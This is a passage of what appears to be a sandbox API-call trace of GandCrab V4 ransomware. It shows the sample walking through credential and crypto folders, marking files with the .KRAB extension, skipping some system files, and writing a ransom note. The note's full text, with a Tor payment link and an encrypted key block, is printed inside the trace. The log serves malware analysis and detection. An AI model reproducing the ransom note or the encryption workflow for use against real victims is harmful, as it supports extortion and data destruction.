CloseHandle (hObject=0x3ac) returned 1 [0059.112] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.112] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0059.112] GetSystemTime (in: lpSystemTime=0x2ea0400 | out: lpSystemTime=0x2ea0400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x6, wMilliseconds=0x13f)) [0059.112] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0059.113] GetWindowsDirectoryW (in: lpBuffer=0x2f30000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0059.113] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f30200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f30600, lpMaximumComponentLength=0x2f30608, lpFileSystemFlags=0x2f30604, lpFileSystemNameBuffer=0x2f30400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f30600*=0xd2ca4def, lpMaximumComponentLength=0x2f30608*=0xff, lpFileSystemFlags=0x2f30604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0059.113] wsprintfW (in: param_1=0x2ea0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Credentials\\d2ca4a08d2ca4dee3d.lock") returned 83 [0059.113] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Credentials\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\credentials\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3ac [0059.114] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.114] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.114] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Credentials\\") returned 60 [0059.114] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Credentials\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Credentials\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Credentials\\*" [0059.114] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Credentials\\*", lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 0xfbd960 [0059.114] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0059.115] FindNextFileW (in: hFindFile=0xfbd960, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0059.115] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0059.115] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0059.115] FindNextFileW (in: hFindFile=0xfbd960, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0059.115] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0059.115] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0059.115] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Credentials\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Credentials\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Credentials\\d2ca4a08d2ca4dee3d.lock" [0059.115] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0059.115] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Credentials\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 88 [0059.115] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Credentials\\d2ca4a08d2ca4dee3d.lock") returned 83 [0059.115] lstrlenW (lpString=".lock") returned 5 [0059.115] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0059.116] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".lock ") returned 6 [0059.116] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.116] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.116] FindNextFileW (in: hFindFile=0xfbd960, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0059.117] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0059.117] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0059.117] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Credentials\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Credentials\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Credentials\\KRAB-DECRYPT.txt" [0059.117] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0059.117] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Credentials\\KRAB-DECRYPT.txt.KRAB") returned 81 [0059.117] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Credentials\\KRAB-DECRYPT.txt") returned 76 [0059.117] lstrlenW (lpString=".txt") returned 4 [0059.117] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0059.117] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".txt ") returned 5 [0059.117] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.119] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Credentials\\KRAB-DECRYPT.txt") returned 76 [0059.119] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Credentials\\KRAB-DECRYPT.txt") returned 76 [0059.119] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0059.119] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0059.119] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0059.119] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0059.119] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0059.119] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0059.119] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0059.119] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0059.119] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0059.119] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0059.119] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.120] FindNextFileW (in: hFindFile=0xfbd960, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 0 [0059.120] FindClose (in: hFindFile=0xfbd960 | out: hFindFile=0xfbd960) returned 1 [0059.120] CloseHandle (hObject=0x3ac) returned 1 [0059.120] FindNextFileW (in: hFindFile=0xfbd560, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0059.120] lstrcmpW (lpString1="Crypto", lpString2=".") returned 1 [0059.120] lstrcmpW (lpString1="Crypto", lpString2="..") returned 1 [0059.120] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\", lpString2="Crypto" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto" [0059.120] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\" [0059.120] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2ea0000 [0059.121] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0059.121] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0059.121] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0059.121] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0059.121] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.121] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0059.121] wsprintfW (in: param_1=0x2ea0200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\\\KRAB-DECRYPT.txt") returned 72 [0059.122] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\crypto\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0059.123] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0059.123] WriteFile (in: hFile=0x3ac, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338eaa0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338eaa0*=0x1f6e, lpOverlapped=0x0) returned 1 [0059.124] CloseHandle (hObject=0x3ac) returned 1 [0059.124] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.124] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0059.124] GetSystemTime (in: lpSystemTime=0x2ea0400 | out: lpSystemTime=0x2ea0400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x6, wMilliseconds=0x14b)) [0059.125] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0059.125] GetWindowsDirectoryW (in: lpBuffer=0x2f30000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0059.125] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f30200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f30600, lpMaximumComponentLength=0x2f30608, lpFileSystemFlags=0x2f30604, lpFileSystemNameBuffer=0x2f30400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f30600*=0xd2ca4def, lpMaximumComponentLength=0x2f30608*=0xff, lpFileSystemFlags=0x2f30604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0059.125] wsprintfW (in: param_1=0x2ea0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\d2ca4a08d2ca4dee3d.lock") returned 78 [0059.125] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\crypto\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3ac [0059.126] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.126] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.126] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\") returned 55 [0059.126] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\*" [0059.126] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\*", lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 0xfbd420 [0059.127] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0059.127] FindNextFileW (in: hFindFile=0xfbd420, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0059.127] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0059.127] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0059.127] FindNextFileW (in: hFindFile=0xfbd420, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0059.127] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0059.127] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0059.127] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\d2ca4a08d2ca4dee3d.lock" [0059.127] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0059.127] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 83 [0059.127] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\d2ca4a08d2ca4dee3d.lock") returned 78 [0059.127] lstrlenW (lpString=".lock") returned 5 [0059.127] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0059.128] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".lock ") returned 6 [0059.128] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.128] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.128] FindNextFileW (in: hFindFile=0xfbd420, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0059.128] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0059.128] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0059.128] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\KRAB-DECRYPT.txt" [0059.128] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0059.129] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\KRAB-DECRYPT.txt.KRAB") returned 76 [0059.129] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\KRAB-DECRYPT.txt") returned 71 [0059.130] lstrlenW (lpString=".txt") returned 4 [0059.130] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0059.130] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".txt ") returned 5 [0059.130] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.130] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\KRAB-DECRYPT.txt") returned 71 [0059.130] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\KRAB-DECRYPT.txt") returned 71 [0059.131] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0059.131] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0059.131] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0059.131] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0059.131] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0059.131] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0059.131] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0059.131] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0059.131] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0059.131] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0059.131] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.131] FindNextFileW (in: hFindFile=0xfbd420, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0059.131] lstrcmpW (lpString1="RSA", lpString2=".") returned 1 [0059.131] lstrcmpW (lpString1="RSA", lpString2="..") returned 1 [0059.131] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\", lpString2="RSA" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA" [0059.131] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\" [0059.131] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2ea0000 [0059.132] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0059.132] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0059.132] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0059.132] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0059.132] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.133] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0059.133] wsprintfW (in: param_1=0x2ea0200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\\\KRAB-DECRYPT.txt") returned 76 [0059.133] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\crypto\\rsa\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0059.139] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of 